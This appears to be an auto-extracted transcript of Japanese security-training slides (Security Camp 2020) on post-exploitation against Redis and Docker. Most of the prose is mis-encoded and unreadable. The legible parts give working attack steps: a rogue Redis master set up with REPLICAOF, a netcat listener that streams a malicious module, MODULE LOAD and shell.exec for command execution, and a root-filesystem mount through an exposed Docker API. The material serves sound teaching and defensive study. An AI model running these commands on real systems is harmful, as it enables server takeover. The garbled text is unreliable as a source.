0, 4:/$ ೚ҙͷσʔλ

4:/$ʹରͯ͠σʔλΛྲྀ͠ࠐΉ *3 $5 PSYNC $1 ? $2 -1 +OK SYNC
$10 aaaaaaaaaa SFEJTʹೖͬͯEVNQSECΛ֬ೝ $ docker-compose exec redis bash root@6a0b1d9439a7:/data# cat dump.rdb aaaaaaaaaa ݸͷB͕ॻ͖ࠐ·Ε͍ͯΕ͹0,

PSYNCʹର͢Δ߈ܸʢ2/2ʣ w 14:/$ʹରͯ͠'6--3&4:/$Λฦ͢ʢ࣮͸ৗʹͬͪ͜Λ࢖͑͹ྑ͍ʣ w P⒎TFUΛແࢹͯ͠ૹΒΕ͖ͯͨσʔλͰ্ॻ͖͢Δ SPHVF 3FQMJDB 14:/$ '6--3&4:/$

FULLRESYNC w .BTUFSʹόοϑΝʔ͕ͳ͍৔߹ɺݹ͍SFQMJDBUJPOJEͷ৔߹͸'6--3&4:/$Λߦ͏ w '6--3&4:/$SFQMJDBUJPOJEP⒎TFU 8IFOSFQMJDBTDPOOFDUUPNBTUFST UIFZVTFUIF14:/$DPNNBOEJO PSEFSUPTFOEUIFJSPMENBTUFSSFQMJDBUJPO*%BOEUIFP⒎TFUTUIFZ QSPDFTTFETPGBS5IJTXBZUIFNBTUFSDBOTFOEKVTUUIFJODSFNFOUBM QBSUOFFEFE)PXFWFSJGUIFSFJTOPUFOPVHICBDLMPHJOUIFNBTUFS
CV⒎FST PSJGUIFSFQMJDBJTSFGFSSJOHUPBOIJTUPSZ SFQMJDBUJPO*% XIJDIJT OPMPOHFSLOPXO UIBOBGVMMSFTZODISPOJ[BUJPOIBQQFOTJOUIJTDBTFUIF SFQMJDBXJMMHFUBGVMMDPQZPGUIFEBUBTFU GSPNTDSBUDI IUUQTSFEJTJPUPQJDTSFQMJDBUJPO

'6--3&4:/$ͰσʔλΛྲྀ͠ࠐΉ *3 $5 PSYNC $40 d3d15637ec5ecf9f593ebb5f7345c3e2b2f52689 $1 1 +FULLRESYNC AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0 $10 bbbbbbbbbb ઌఔಉ༷ʹSFEJTʹೖͬͯC͕ݸॻ͖ࠐ·Ε͍ͯΔ͜ͱΛ֬ೝ͢Δ

ݱঢ়·ͱΊʢ3FEJT3&1-*$"0'ฤʣ w ߈ܸର৅ͷ3FEJTʹର͠߈ܸऀ͸೚ҙͷ3FEJTίϚϯυΛൃߦՄೳ w 3&1-*$"0'Λ࢖ͬͯର৅αʔόΛ3FQMJDBʹઃఆ w ಉ࣌ʹ߈ܸऀαʔόΛ.BTUFSʹઃఆ w 4:/$14:/$Λ3FQMJDB͔Βൃߦͤ͞೚ҙͷϖΠϩʔυΛฦ͠EVNQSECʹ ޷͖ͳσʔλΛॻ͖ࠐΉ
·ͩ04ͷγΣϧ͕औΕ͍ͯͳ͍ʂʂ

೚ҙͷϑΝΠϧॻ͖ࠐΈ͸Մೳ 3FEJT.PEVMFT

3FEJT.PEVMFT w ࣗ࡞ͷίϚϯυΛఆٛͰ͖Δ w .0%6-&-0"%ͰϞδϡʔϧΛϩʔυՄೳ 04ίϚϯυΛ࣮ߦ͢ΔϞδϡʔϧΛ࡞Ε͹ྑ͍

3FEJT.PEVMF GSPN.FUBTQMPJU w ߦҎ಺Ͱ؆୯ʹॻ͚Δ w ࠓճͷߨٛͰ͸.FUBTQMPJUͷίʔυΛྲྀ༻ w ษڧͷͨΊʹࣗ࡞ͯ͠Έͯ΋ྑ͍ IUUQTHJUIVCDPNSBQJENFUBTQMPJUGSBNFXPSLCMPCBDFEDEGFDGFECBEGEEBUBFYQMPJUTSFEJTFYQFYQD

ཪଆ·Ͱཧղ͢Δͷ͕ॏཁʢ࠶ܝʣ ͨͩར༻͢Δ͚ͩ FH.FUBTQMPJUΛ࣮ߦ͢Δ͚ͩ ཪଆ·Ͱཧղ͢Δ FHͲ͏͍͏ݪཧͰ߈ܸ͕੒ཱ͢Δ͔ࣗ෼Ͱࢼ͢ ηΩϡϦςΟʹ͓͍ͯ͸͕ͬͪ͜ॏཁ

3FEJT.PEVMFΛྲྀ͠ࠐΉ w Ұ౓៉ྷʹͯ͠΍Γ௚͢ w Ϟδϡʔϧ͸طʹSPHVFίϯςφ಺ʹ഑ஔࡁΈʢFYQTPʣ root@b6d0575dafc4:/rogue# exit $ docker-compose down
$ docker-compose up -d $ docker-compose exec rogue bash root@d99f653690ed:/rogue# cd /data/redis-rogue-server/ root@d99f653690ed:/data/redis-rogue-server# ls exp.so exp.so

3FEJT.PEVMFΛྲྀ͠ࠐΉ w ࠓճ͸ΠϯλϥΫςΟϒʹ΍ΒͣʹҰؾʹύΠϓͰྲྀ͠ࠐΉ root@efb5ffa4adf5:/rogue# redis-cli -h redis replicaof rogue 10000
OK root@efb5ffa4adf5:/rogue# wc -c < exp.so 46800 root@efb5ffa4adf5:/rogue# ( echo "+PONG"; echo "+OK"; echo "+OK"; echo "+OK"; echo "\$46800"; cat exp.so ; ) | nc -lk -p 10000

3FEJT.PEVMFΛಡΈࠐΉ w EVNQSECʹϞδϡʔϧ͕ॻ͖ࠐ·Ε͍ͯΔͷͰ.0%6-&-0"%͢Δ w ͋ͱ͸TIFMMFYFDͰ޷͖ͳίϚϯυΛ࣮ߦՄೳ root@efb5ffa4adf5:/rogue# redis-cli -h redis redis:6379>
MODULE LOAD ./dump.rdb OK redis:6379> shell.exec "id" "uid=999(redis) gid=999(redis) groups=999(redis)\n" TIFMMFYFDͷग़ྗ͸࠷ॳΰϛ͕ೖ͍ͬͯΔՄೳੑ͕͋Δ͕ ਺ճ࣮ߦ͢Δͱ៉ྷʹͳΔʢݪҼະௐࠪʣ

·ͱΊʢ3FEJT3&1-*$"0'ฤʣ SPHVF SFEJT 4:/$14:/$ .PEVMFΛฦ͢ 3&1-*$"0'Ͱ3FQMJDBʹઃఆ .PEVMFΛॻ͖ࠐΉ .0%6-&-0"% 04ίϚϯυ࣮ߦ

%PDLFSฤ

%PDLFSͷ֓ཁ 3&45"1*ʹΑΔૢ࡞ %PDLFS $-* %PDLFS %BFNPO 3&45"1* EPDLFSίϚϯυ S ίϯςφ

*OUFSOFU %PDLFS"1*͕ޡͬͯެ։͞Ε͍ͯΔ৔߹ ίϯςφ͕࡞Γ์୊ʂʂʂ S %PDLFS"1*ͷެ։͸ SPPUݖݶͷެ։ʹ౳͍͠ ˞ݱࡏ͸3PPUMFTTNPEF΋͋Δ

߈ܸऀʹ౎߹ͷྑ͍ίϯςφΛ࡞੒ ΛϚ΢ϯτͯ͠͠·͏ $ export DOCKER_HOST=tcp://x.x.x.x:2376 $ docker run -it -v
/:/mnt alpine chroot /mnt w %0$,&3@)045ʹ߈ܸର৅Λࢦఆ w ͋ͱ͸ΛNOUʹϚ΢ϯτͯ͠DISPPU͢Δ͚ͩ ؆୯

ཧղΛਂΊΔ %PDLFSίϚϯυΛ࢖Θͣʹ΍ͬͯΈΔ IUUQTLORZGIBUFOBCMPHDPNFOUSZ

%PDLFSίϯςφ಺͔ΒͷFTDBQF w QSJWJMFHFEΛ͚͍ͭͯΔ৔߹ w EFWΛ࢖͏ํ๏ w OPUJpDBUJPOPOSFMFBTFΛ࢖͏ํ๏ w EPDLFSͷ੬ऑͳόʔδϣϯΛ࢖͍ͬͯΔ৔߹ w
Χʔωϧͷ੬ऑͳόʔδϣϯΛ࢖͍ͬͯΔ৔߹ ղઆ͢Δ࣌ؒͳ͔ͬͨͷͰࢿྉࢀর IUUQTJCMBDLIBUDPN64"5IVSTEBZVT&EXBSET$PNQFOEJVN0G$POUBJOFS&TDBQFTVQQEG

·ͱΊ w ৵֐ൣғΛ೺Ѳ͢ΔͨΊʹ͸߈ܸऀ͕৵ೖޙʹग़དྷΔ͜ͱΛ೺Ѳ͢Δඞཁ͕͋Δ w 1PTU&YQMPJUBUJPOΛֶͿ͜ͱ͸ͦͷॿ͚ͱͳΔ w ۩ମྫͱͯ͠ϛυϧ΢ΣΞ৵ೖޙʹ04ίϚϯυ͕࣮ߦՄೳʹͳΔ৔߹΋͋Δ w .Z42- 1PTUHSF42-
3FEJT %PDLFS FUD w ࣮ࡍʹखΛಈ͔ͯ͠ཪଆ·Ͱཧղ͢Δ͜ͱ͕ॏཁ ఁ࡯ ෢ثԽ ഑ૹ ߈ܸ Πϯετʔϧ ৵ೖ֦େ ໨తୡ੒ ϛυϧ΢ΣΞʹ৵ೖ Կ͕Մೳ͔ʁ

セキュリティ・キャンプ全国大会2020 オンライン B8 / seccamp2020-b8

セキュリティ・キャンプ全国大会2020 オンライン B8 / seccamp2020-b8

More Decks by Teppei Fukuda

Other Decks in Programming

Featured

Transcript